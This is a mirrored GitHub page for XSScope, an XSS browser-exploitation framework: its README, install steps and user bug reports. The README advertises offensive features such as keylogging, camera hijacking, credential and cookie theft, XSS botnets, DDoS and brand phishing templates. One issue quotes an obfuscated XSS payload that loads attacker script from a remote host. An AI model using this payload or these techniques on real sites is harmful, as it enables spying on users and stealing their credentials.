kleiton0x00 / xsscope Goto Github PK

XSScope is one of the most powerful and advanced GUI Framework for Modern Browser exploitation via XSS.

License: GNU General Public License v3.0

PHP 1.11% Python 10.41% HTML 62.24% Shell 0.24% JavaScript 26.00%

bug-hunting xss cybersecurity ethical-hacking

xsscope's Introduction

Go beyond the alert

XSScope is one of the most advanced GUI Framework for XSS Clientside attacks. It can perform different XSS attack and HTML Injection in real time.

Features

Perform XSS botnet attack(s). Every victim who is affected by XSS payload (in the webserver), will contantly bind the payload and wait for commands from attacker. A bind payload is one that waits for a connection from its controller.
HTTP Flood (DDos) via XSS botnets
Generates a Port Forwarding TCP and a Local PHP Server as well
Automatic payload generator for Bug Hunting (Blind, Stored, Reflected & DOM XSS)
Generate Local HTTP Server

Spying Features

Camera Hijacking
Get victim's saved credentials from the vulnerable website
Gather information about victim (Browser, version, Operating System, User Agent, Cookie (if any), Java enabled, Online status, Language used, Cookie enabled)
Keylogger
Screenshot victim's browser
Get victim's real-time location
Execute .NET Shellcode commands
Force download malicious file

HTML code injection

Generate Phishing Websites with 2 clicks using pregenerated HTML codes such as:
- Amazon
- Google
- Line
- LinkedIn
- Steam
- Twitch
- Verizon
- WiFi (expired session)
Generate Website Defacion with 2 clicks using a HTML template
Import HTML file from external file
Add your own HTML code

Arbitrary Javascript code execution

Execute Javascript code into victim's browser once a shell is opened in your listener

Funny modules:

Change every link in the website
Change every image in the website
Clickjacker (redirect to another URI once user click somewhere on the website)

Installation

Clone the Github repo into your local machine:
git clone https://github.com/kleiton0x00/XSScope.git
cd XSScope
Note: Zipfile library is not required if you are using Linux/MacOS. Ignore the error.
Run setup.sh in your terminal:
chmod +x setup.sh
./setup.sh
NOTE: If setup.sh script asks for Ngrok Authtoken, you have to create an account HERE and grab the Authtoken.
You are good to go, now run the software by executing:
python3 xsscope.py

For more detailed installation manual please refer the Wiki

Flowchart

FAQ

Please refer the Wiki for more advanced tips.

Demo

For Demo go to Wiki/Demo

Gallery

XSScope IN ACTION

XSScope Main Interface.

Creating an Agent Module.

Generated XSS Payloads

Generating Advanced Phishing Website using HTML Injection

Performing RCE into victim's browser

Legal disclaimer:

Usage of XSScope for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Contribution, Credits & License

Ways to contribute

Suggest a feature
Report a bug
Fix something and open a pull request
Spread the word

Licensed under the GNU GPLv3, see LICENSE for more information.

Contact

For any problem, copyright disclaimers, etc. please feel free to email me: [email protected]

xsscope's People

Contributors

Stargazers

Watchers

xsscope's Issues

injection issue

i inject this payload locally in metasploitable website with low security level
<svg/onload=eval(atob('PHNjcmlwdCBzcmM9Imh0dHA6Ly8xOTIuMTY4LjguMTY4OjQwNDAveHNzY29wZS5qcyI+PC9zY3JpcHQ+'))>
and getthe following from the browser console , but nothing happened

Injector: Started content script... links.js:4:11
Injector: Found 1 forms. links.js:12:32
Injector: Found 19 links. links.js:47:32
Injector: 4 look interesting. links.js:64:11
Injector: Started content script... links.js:4:11
Injector: Found 1 forms. links.js:12:32
Injector: Found 19 links. links.js:47:32
Injector: 4 look interesting.

generating a browser shell

I'm a complete noob at this and I would like to learn how to generate a browser shell with xsscope on an android device

Error execution

Hello,

When I run XSScope don't work. I follow the instruction of the github

[Fri Jan 15 08:54:17 2021] PHP 7.4.11 Development Server (http://localhost:1337) started
Exception in Tkinter callback                                                                       
Traceback (most recent call last):
  File "/usr/lib/python3.9/tkinter/__init__.py", line 1885, in __call__
    return self.func(*args)
  File "/opt/XSScope/xsscope.py", line 1333, in start_xsscope
    tcp_server = str(tcp_server[6:])
TypeError: 'NgrokTunnel' object is not subscriptable

Any recomendation ?

A greeting and thanks

Error execution

Hello,
When I run this script and open http://localhost:1337 I have this error y don't happend nothing

The requested resource / was not found on this server.

A greeting and thanks

no payloads

when i open payloads i get this ( blank screen )

When i press build payload no popup shows payload build successfully.After choosing html injection and clicked apply code no xss payloaad option visible from html code injection form only import code and exit appears

sudo python3 xsscope.py
[Fri Dec 11 13:03:17 2020] PHP 7.4.11 Development Server (http://localhost:1337) started
Exception in Tkinter callback
Traceback (most recent call last):
File "/usr/local/lib/python3.7/tkinter/init.py", line 1702, in call
return self.func(*args)
File "xsscope.py", line 588, in copy_payload1
pyperclip.copy(payload1)
File "/usr/local/lib/python3.7/site-packages/pyperclip/init.py", line 658, in lazy_load_stub_copy
copy, paste = determine_clipboard()
File "/usr/local/lib/python3.7/site-packages/pyperclip/init.py", line 568, in determine_clipboard
os.environ["XDG_SESSION_TYPE"] == "wayland" and
File "/usr/local/lib/python3.7/os.py", line 678, in getitem
raise KeyError(key) from None
KeyError: 'XDG_SESSION_TYPE'
Exception in Tkinter callback
Traceback (most recent call last):
File "/usr/local/lib/python3.7/tkinter/init.py", line 1702, in call
return self.func(*args)
File "xsscope.py", line 603, in copy_payload6
pyperclip.copy(payload6)
File "/usr/local/lib/python3.7/site-packages/pyperclip/init.py", line 658, in lazy_load_stub_copy
copy, paste = determine_clipboard()
File "/usr/local/lib/python3.7/site-packages/pyperclip/init.py", line 568, in determine_clipboard
os.environ["XDG_SESSION_TYPE"] == "wayland" and
File "/usr/local/lib/python3.7/os.py", line 678, in getitem
raise KeyError(key) from None
KeyError: 'XDG_SESSION_TYPE'

[Fri Dec 11 13:22:17 2020] PHP 7.4.11 Development Server (http://localhost:1337) started
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, vnc, wayland-egl, wayland, wayland-xcomposite-egl, wayland-xcomposite-glx, webgl, xcb.

https://streamable.com/k9nhnt

Error Execute

When I execute get this error :
python3 xsscope.py
Process Process-2:
Traceback (most recent call last):
File "/usr/lib/python3.6/multiprocessing/process.py", line 258, in _bootstrap
self.run()
File "/usr/lib/python3.6/multiprocessing/process.py", line 93, in run
self._target(*self._args, **self._kwargs)
File "xsscope.py", line 1244, in main
root_main = tk.Tk()
File "/usr/lib/python3.6/tkinter/init.py", line 2023, in init
self.tk = _tkinter.create(screenName, baseName, className, interactive, wantobjects, useTk, sync, use)
_tkinter.TclError: no display name and no $DISPLAY environment variable
[Mon Apr 10 13:48:06 2023] PHP 8.1.17 Development Server (http://localhost:1337) started

HTTP - Mixed active content load block

Error to load script via HTTP Ngrok connection. Most browsers now block mixed active content load so any XSS attack like this will not work. I think you should use HTTPS to host the script on ngrok.